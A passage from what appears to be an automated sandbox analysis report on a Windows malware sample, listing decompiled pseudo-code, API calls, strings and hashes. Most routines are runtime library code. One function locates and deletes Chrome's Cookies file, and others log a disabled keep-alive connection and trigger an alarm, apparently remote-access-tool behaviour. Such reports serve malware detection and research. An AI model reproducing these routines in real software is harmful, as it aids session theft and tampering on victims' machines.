						 *((intOrPtr*)(E00432914())) = 0x16;
						E00430C7A();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00432914())) = 0x16;
				E00430C7A();
				return 0;
			}
















                                            0x004466b8
                                            0x004466bd
                                            0x004466d7
                                            0x004466da
                                            0x004466dc
                                            0x004466f5
                                            0x004466f7
                                            0x004466fe
                                            0x00446700
                                            0x00446709
                                            0x0044670a
                                            0x0044670e
                                            0x00446714
                                            0x00446717
                                            0x00446719
                                            0x00446733
                                            0x00446736
                                            0x00446738
                                            0x00446745
                                            0x0044674b
                                            0x0044674d
                                            0x00446761
                                            0x00446763
                                            0x00446767
                                            0x00446767
                                            0x00446768
                                            0x0044674f
                                            0x00446756
                                            0x0044675b
                                            0x0044674d
                                            0x0044676b
                                            0x00446770
                                            0x0044671b
                                            0x00446722
                                            0x00446727
                                            0x00446727
                                            0x004466de
                                            0x004466e3
                                            0x004466e9
                                            0x004466ee
                                            0x004466ee
                                            0x00000000
                                            0x00446775
                                            0x004466c4
                                            0x004466ca
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f851d9900338ae0dbc26ff655b7ffd4897faa8742aca2aa0861060d37cb8c85f
                                            • Instruction ID: 76f4863287706620d5a1eadc473e9cd8da48724ae716a9afdf46f1cd12a248e2
                                            • Opcode Fuzzy Hash: f851d9900338ae0dbc26ff655b7ffd4897faa8742aca2aa0861060d37cb8c85f
                                            • Instruction Fuzzy Hash: 0A112772504115BFEB202F738C48D6B3A68EF8B779F12166AF811D7250DA388C019769
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00410D6F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71sleeplibraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 45%
                                            			E00410D6F(void* __edx) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				intOrPtr* _t44;

				_t40 = __edx;
				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t44( &_v52,  &_v28,  &_v20);
				Sleep(0x3e8);
				 *_t44( &_v44,  &_v36,  &_v12);
				_t25 = E00410E24( &_v12);
				_t26 = E00410E24( &_v20);
				asm("sbb ebx, edx");
				_t27 = E00410E24( &_v28);
				asm("sbb ebx, edx");
				_v8 = _t25 - _t26 - _t27 + E00410E24( &_v36);
				asm("adc ebx, edx");
				_t29 = E00410E24( &_v44);
				asm("sbb esi, edx");
				_t30 = E00410E24( &_v52);
				asm("adc esi, edx");
				return E00446DA0(E00446D60(_t25 - _t26 - _t27 + E00410E24( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

















                                            0x00410d6f
                                            0x00410d8f
                                            0x00410d9d
                                            0x00410da4
                                            0x00410db6
                                            0x00410dbb
                                            0x00410dc7
                                            0x00410dd1
                                            0x00410dd3
                                            0x00410ddd
                                            0x00410de9
                                            0x00410dec
                                            0x00410dee
                                            0x00410dfc
                                            0x00410dfe
                                            0x00410e09
                                            0x00410e23

                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,00460A68), ref: 00410D82
                                            • GetProcAddress.KERNEL32(00000000), ref: 00410D89
                                            • Sleep.KERNEL32(000003E8,?,00460A68), ref: 00410DA4
                                            • __aulldiv.LIBCMT ref: 00410E18
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProcSleep__aulldiv
                                            • String ID: GetSystemTimes$kernel32.dll
                                            • API String ID: 482274533-1354958348
                                            • Opcode ID: 4c904f08f56f2ab251709ebb96c5511ce39699d2834fad65dce7e0138bbc79b4
                                            • Instruction ID: 26ae771199756d066af525d16dcc9ccef05aeda86734d845b3774739320aed2c
                                            • Opcode Fuzzy Hash: 4c904f08f56f2ab251709ebb96c5511ce39699d2834fad65dce7e0138bbc79b4
                                            • Instruction Fuzzy Hash: DB1130B7D002286ACB14A7F6DC85DFF7BBCAB84654F05062AFA05A3141ED785A4886A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043E96A, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0043E96A(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E0043E6B1(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E0043E6B1(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E0043E6B1(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E0043E6B1(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E0043E6B1(_t5, 2);
					E00437795( *((intOrPtr*)(_t45 + 0xa0)));
					E00437795( *((intOrPtr*)(_t45 + 0xa4)));
					E00437795( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E0043E6B1(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E0043E6B1(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E0043E6B1(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E0043E6B1(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E0043E6B1(_t13, 2);
					E00437795( *((intOrPtr*)(_t45 + 0x154)));
					E00437795( *((intOrPtr*)(_t45 + 0x158)));
					E00437795( *((intOrPtr*)(_t45 + 0x15c)));
					return E00437795( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}





                                            0x0043e970
                                            0x0043e975
                                            0x0043e97e
                                            0x0043e983
                                            0x0043e989
                                            0x0043e98e
                                            0x0043e994
                                            0x0043e999
                                            0x0043e99f
                                            0x0043e9a4
                                            0x0043e9ad
                                            0x0043e9b8
                                            0x0043e9c3
                                            0x0043e9ce
                                            0x0043e9d3
                                            0x0043e9dc
                                            0x0043e9e1
                                            0x0043e9ea
                                            0x0043e9f2
                                            0x0043e9fb
                                            0x0043ea00
                                            0x0043ea09
                                            0x0043ea0e
                                            0x0043ea17
                                            0x0043ea22
                                            0x0043ea2d
                                            0x0043ea38
                                            0x00000000
                                            0x0043ea48
                                            0x0043ea4d

                                            APIs
                                              • Part of subcall function 0043E6B1: _free.LIBCMT ref: 0043E6DA
                                            • _free.LIBCMT ref: 0043E9B8
                                              • Part of subcall function 00437795: HeapFree.KERNEL32(00000000,00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000), ref: 004377AB
                                              • Part of subcall function 00437795: GetLastError.KERNEL32(00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000,00000000), ref: 004377BD
                                            • _free.LIBCMT ref: 0043E9C3
                                            • _free.LIBCMT ref: 0043E9CE
                                            • _free.LIBCMT ref: 0043EA22
                                            • _free.LIBCMT ref: 0043EA2D
                                            • _free.LIBCMT ref: 0043EA38
                                            • _free.LIBCMT ref: 0043EA43
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 1ae6939dd6555d45bd6b9c2d77fd037716684438ded9dc0a8473607124d95373
                                            • Instruction ID: a4ad02ca302c75b2747693f40bd1139a87e876e0afa3a46c65c5c1800119c9fb
                                            • Opcode Fuzzy Hash: 1ae6939dd6555d45bd6b9c2d77fd037716684438ded9dc0a8473607124d95373
                                            • Instruction Fuzzy Hash: 4E1160B1542B04BAD530B7B3CC47FCB779C9F09704F80581EF29AAA0D2E728B5244654
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042E885, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E0042E885(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x45f090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E0042B56B(__eflags,  *0x45f090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E0042B5A5(__eflags,  *0x45f090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E004368EF(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E0042B5A5(__eflags,  *0x45f090, 0);
								} else {
									__eflags = E0042B5A5(__eflags,  *0x45f090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00437795(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                                            0x0042e88c
                                            0x0042e89f
                                            0x0042e8a6
                                            0x0042e8a9
                                            0x0042e8ac
                                            0x0042e8c5
                                            0x0042e8c5
                                            0x0042e8ae
                                            0x0042e8ae
                                            0x0042e8b0
                                            0x0042e8ba
                                            0x0042e8c0
                                            0x0042e8c1
                                            0x0042e8c3
                                            0x0042e8d3
                                            0x0042e8d7
                                            0x0042e8d9
                                            0x0042e8ed
                                            0x0042e8ed
                                            0x0042e8f6
                                            0x0042e8db
                                            0x0042e8e9
                                            0x0042e8eb
                                            0x0042e8ff
                                            0x0042e901
                                            0x0042e901
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e8eb
                                            0x0042e904
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e8c3
                                            0x0042e8b0
                                            0x0042e90c
                                            0x0042e916
                                            0x0042e88e
                                            0x0042e890
                                            0x0042e890

                                            APIs
                                            • GetLastError.KERNEL32(?,?,0042E87C,0042B994), ref: 0042E893
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0042E8A1
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0042E8BA
                                            • SetLastError.KERNEL32(00000000,?,0042E87C,0042B994), ref: 0042E90C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d46efeb57c7a988b4e373370dfe190cca7da5db1f909f22fbcfb99509c846d22
                                            • Instruction ID: ad1338abf66223cdc6da4c0b79f0cb7377893fd7f337fa63199f0a4781587fba
                                            • Opcode Fuzzy Hash: d46efeb57c7a988b4e373370dfe190cca7da5db1f909f22fbcfb99509c846d22
                                            • Instruction Fuzzy Hash: 5301F5323097316EA6243777BC89A172755EB42B79760023FF110571E3FB598C45A18D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00438DE5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00438DE5(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x45f210; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E004368EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E0043804F(_t13, _t16, __eflags,  *0x45f210, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00438BD3(_t13, _t15, 0x460930);
							E00437795(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00437795();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E00437FF9(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                                            0x00438de5
                                            0x00438df0
                                            0x00438df2
                                            0x00438df4
                                            0x00438df9
                                            0x00438dfc
                                            0x00438e0a
                                            0x00438e16
                                            0x00438e19
                                            0x00438e1c
                                            0x00438e2e
                                            0x00438e33
                                            0x00438e35
                                            0x00438e40
                                            0x00438e46
                                            0x00438e4e
                                            0x00438e50
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00438e37
                                            0x00438e37
                                            0x00000000
                                            0x00438e37
                                            0x00438e1e
                                            0x00438e1e
                                            0x00438e1f
                                            0x00438e1f
                                            0x00438e52
                                            0x00438e53
                                            0x00438e53
                                            0x00438dfe
                                            0x00438e04
                                            0x00438e08
                                            0x00438e5b
                                            0x00438e5c
                                            0x00438e62
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00438e08
                                            0x00438e69

                                            APIs
                                            • GetLastError.KERNEL32(C:\Users\user\Desktop\V8IB839cvz.exe,00000000,00000000,00430C15,00000000,00461210,?,00430C99,00000000,00000000,00000000,00000000,00000000,?,00461210), ref: 00438DEA
                                            • _free.LIBCMT ref: 00438E1F
                                            • _free.LIBCMT ref: 00438E46
                                            • SetLastError.KERNEL32(00000000), ref: 00438E53
                                            • SetLastError.KERNEL32(00000000), ref: 00438E5C
                                            Strings
                                            • C:\Users\user\Desktop\V8IB839cvz.exe, xrefs: 00438DE9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$_free
                                            • String ID: C:\Users\user\Desktop\V8IB839cvz.exe
                                            • API String ID: 3170660625-1245965800
                                            • Opcode ID: 20e427fde3ac6fdf0d6ec21b99bb7cf44df26c2d48da9cfb2873894dbee9f5d5
                                            • Instruction ID: 7676a0d68473ac5ece80210b5762001542168000f1df1159d01f8353af1a3d1a
                                            • Opcode Fuzzy Hash: 20e427fde3ac6fdf0d6ec21b99bb7cf44df26c2d48da9cfb2873894dbee9f5d5
                                            • Instruction Fuzzy Hash: 4701267614070177D72163766C46E2B622AABCE7A5F21293FF515D2283FF6CCC05502D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040743A, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 71%
                                            			E0040743A(void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;

				_t34 = __eflags;
				E00402973(_t20,  &_v28, E0040207E(_t20,  &_v52, E00430F6D(_t20, __eflags, "UserProfile")), _t34, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				E00401F97();
				if(DeleteFileA(E00401F2E( &_v28)) != 0) {
					_t28 = _t31 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t31 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E0040207E(_t20, _t28);
						E00407B4A();
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401F97();
				return _t21;
			}












                                            0x0040743a
                                            0x0040745f
                                            0x00407468
                                            0x0040747e
                                            0x004074a4
                                            0x004074a6
                                            0x00000000
                                            0x00407480
                                            0x00407487
                                            0x0040748a
                                            0x00407498
                                            0x0040749a
                                            0x004074ab
                                            0x004074ab
                                            0x004074b0
                                            0x004074b5
                                            0x00407491
                                            0x00407491
                                            0x00407491
                                            0x0040748a
                                            0x004074bd
                                            0x004074c8

                                            APIs
                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00407476
                                            • GetLastError.KERNEL32 ref: 00407480
                                            Strings
                                            • [Chrome Cookies found, cleared!], xrefs: 004074A6
                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00407441
                                            • UserProfile, xrefs: 00407446
                                            • [Chrome Cookies not found], xrefs: 0040749A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteErrorFileLast
                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                            • API String ID: 2018770650-304995407
                                            • Opcode ID: cfcfb28165ca764ec4641c9ad0b4092dfe7e4758a7f6a422d78e7f4abd027958
                                            • Instruction ID: cc432916231e83e554ebede96ff5b17aa88ec5d4b502e5e405cc74ce11e60275
                                            • Opcode Fuzzy Hash: cfcfb28165ca764ec4641c9ad0b4092dfe7e4758a7f6a422d78e7f4abd027958
                                            • Instruction Fuzzy Hash: 7601A731E442056AC604BB75DD6B8BE7B249A11718B50027FF402761D3ED7D6905C59E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401E07, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00401E07(void* __ecx, char _a4) {
				void* _t17;
				void* _t21;
				void* _t22;

				_t21 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t23 = _t22 - 0x18;
					E0040207E(_t17, _t22 - 0x18, "Connection KeepAlive disabled");
					E0040207E(_t17, _t23 - 0x18, "[WARNING]");
					E00410B51(_t17);
				}
				 *(_t21 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t21 + 0x54));
				WaitForSingleObject( *(_t21 + 0x58), 0xffffffff);
				CloseHandle( *(_t21 + 0x58));
				return 1;
			}






                                            0x00401e0b
                                            0x00401e11
                                            0x00000000
                                            0x00401e6f
                                            0x00401e17
                                            0x00401e19
                                            0x00401e23
                                            0x00401e32
                                            0x00401e37
                                            0x00401e3c
                                            0x00401e4e
                                            0x00401e51
                                            0x00401e5c
                                            0x00401e65
                                            0x00000000

                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00401995,00000001,?,00401942), ref: 00401E45
                                            • SetEvent.KERNEL32(00000000,?,00401995,00000001,?,00401942), ref: 00401E51
                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00401995,00000001,?,00401942), ref: 00401E5C
                                            • CloseHandle.KERNEL32(?,?,00401995,00000001,?,00401942), ref: 00401E65
                                              • Part of subcall function 00410B51: GetLocalTime.KERNEL32(00000000), ref: 00410B6B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                            • String ID: Connection KeepAlive disabled$[WARNING]
                                            • API String ID: 2993684571-804309475
                                            • Opcode ID: 075e2d5571db6efddab0707b0d04ba5abccfecd469dbaa414f6f4aff40361d74
                                            • Instruction ID: b1676b989d98fa7d412aea59488c70c4c757b1bcf51ec4a18050b2ec211ccfc8
                                            • Opcode Fuzzy Hash: 075e2d5571db6efddab0707b0d04ba5abccfecd469dbaa414f6f4aff40361d74
                                            • Instruction Fuzzy Hash: BAF0C2759043407BDB1037B5DC0EABB7B98AB02315F0009BAFC41925F1DAF99884979A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041069C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E0041069C(WCHAR* __ecx) {
				void* _t7;
				WCHAR* _t12;
				void* _t14;

				_t15 = _t14 - 0x18;
				_t12 = __ecx;
				E0040207E(_t7, _t14 - 0x18, "Alarm has been triggered!");
				E0040207E(_t7, _t15 - 0x18, "[ALARM]");
				E00410B51(_t7);
				PlaySoundW(_t12, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}






                                            0x0041069e
                                            0x004106a1
                                            0x004106aa
                                            0x004106b9
                                            0x004106be
                                            0x004106dc
                                            0x004106e3
                                            0x004106f0

                                            APIs
                                              • Part of subcall function 00410B51: GetLocalTime.KERNEL32(00000000), ref: 00410B6B
                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 004106CE
                                            • PlaySoundW.WINMM(00000000,00000000), ref: 004106DC
                                            • Sleep.KERNEL32(00002710), ref: 004106E3
                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 004106EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                            • String ID: Alarm has been triggered!$[ALARM]
                                            • API String ID: 614609389-1190268461
                                            • Opcode ID: 626385b0e032755fdfd81427eef756c8fbff6ff32ae13c219f0482eef86f4a80
                                            • Instruction ID: 58941a63f0c44fc7a7ae676fa84196695012db53721af3775480ed3666e0a362
                                            • Opcode Fuzzy Hash: 626385b0e032755fdfd81427eef756c8fbff6ff32ae13c219f0482eef86f4a80
                                            • Instruction Fuzzy Hash: 4AE01A26A4122037962033BAAD0FDAF3E28DAC7B6174100AEFA14661D29AD40C45D6FA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004366F5, Relevance: 9.2, APIs: 6, Instructions: 200COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E004366F5(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E00440A07( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E004368EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E00437795(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E00440A07(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E00435CA3(_t97, _t103, _t120, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E00430CA7();
							asm("int3");
							E00429310(0x45d688, 0x1c);
							_t130 = _a4;
							_t75 = E004366F5(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E00438D61(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E00440CA8( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E00436F33(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E00440CA8( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E00436684(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E00437795( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x45f904 & 0x00000001;
												if(( *0x45f904 & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E00437795( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E004368E6();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
